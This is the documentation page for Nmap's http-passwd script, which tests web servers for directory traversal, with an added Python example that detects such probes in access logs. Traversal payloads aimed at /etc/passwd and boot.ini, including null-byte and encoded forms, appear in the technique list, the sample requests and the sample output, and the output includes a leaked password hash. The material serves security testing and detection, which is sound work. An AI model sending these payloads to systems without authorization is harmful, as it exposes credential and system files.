Script http-passwd

Script types: portrule
Categories: intrusive, vuln
Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse

Script Summary

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

The script uses several techniques:

  • Generic directory traversal by requesting paths like ../../../../etc/passwd.
  • Known specific traversals of several web servers.
  • Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. Candidate paths are searched for under the path controlled by the script argument http-passwd.root.
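The three probe styles above, together with the trailing encoded null byte described under http-passwd.root, leave recognisable traces in web-server access logs. The following added example (not part of the Nmap script or this page) shows detection logic from the server side: it tags request lines that carry path traversal, query-string traversal, or a %00 suffix, and separately checks whether a response body really has the shape of /etc/passwd or boot.ini, the kind of confirmation that separates a genuine leak from a 200-OK error page. All request lines and bodies are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed request lines (method, target, version), not taken from the page.
SAMPLE_REQUESTS = [
    "GET /../../../../etc/passwd HTTP/1.1",
    "GET /test/index.html?../../../../../boot.ini%00 HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
    "GET /download?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1",
]
# Constructed response bodies for the confirmation step.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nnobody:x:65534:65534::/:/bin/false\n"
SAMPLE_BOOTINI = "[boot loader]\ntimeout=30\n[operating systems]\n"
SAMPLE_HTML = "<html><body>404 Not Found</body></html>"

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")              # ../ or ..\ after decoding
SENSITIVE_RE = re.compile(r"etc/passwd|boot\.ini", re.IGNORECASE)
PASSWD_LINE_RE = re.compile(r"^[^:\s]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M)

def analyse_request(line):
    """Tag one access-log request line with the probe styles http-passwd uses:
    traversal in the path, traversal in the query string, and a %00 suffix."""
    parts = line.split(" ")
    if len(parts) < 2:
        return []
    path, _, query = parts[1].partition("?")
    # Decode twice so double-encoded sequences such as %252e%252e%252f are seen.
    dec_path, dec_query = unquote(unquote(path)), unquote(unquote(query))
    findings = []
    if TRAVERSAL_RE.search(dec_path):
        findings.append("path-traversal")
    if TRAVERSAL_RE.search(dec_query):
        findings.append("query-traversal")
    if "\x00" in dec_path + dec_query:               # %00 decodes to a NUL byte
        findings.append("null-byte")
    if SENSITIVE_RE.search(dec_path + dec_query):
        findings.append("sensitive-file")
    return findings

def leaked_file_type(body):
    """Return 'etc/passwd' or 'boot.ini' when the body has that file's shape
    (a root entry with numeric uid/gid, or a [boot loader] section), else None."""
    if PASSWD_LINE_RE.search(body) and re.search(r"^root:", body, re.M):
        return "etc/passwd"
    if "[boot loader]" in body.lower():
        return "boot.ini"
    return None
```

Feed real access-log request lines to analyse_request to alert on scans of this kind, and run leaked_file_type over the bodies your server returned for those requests to tell a blocked probe from an actual disclosure.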

Script Arguments

http-passwd.root

Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-passwd --script-args http-passwd.root=/test/ <target>

Script Output

80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect


80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

Requires


Authors:

  • Kris Katterjohn
  • Ange Gutek

License: Same as Nmap--See https://nmap.org/book/man-legal.html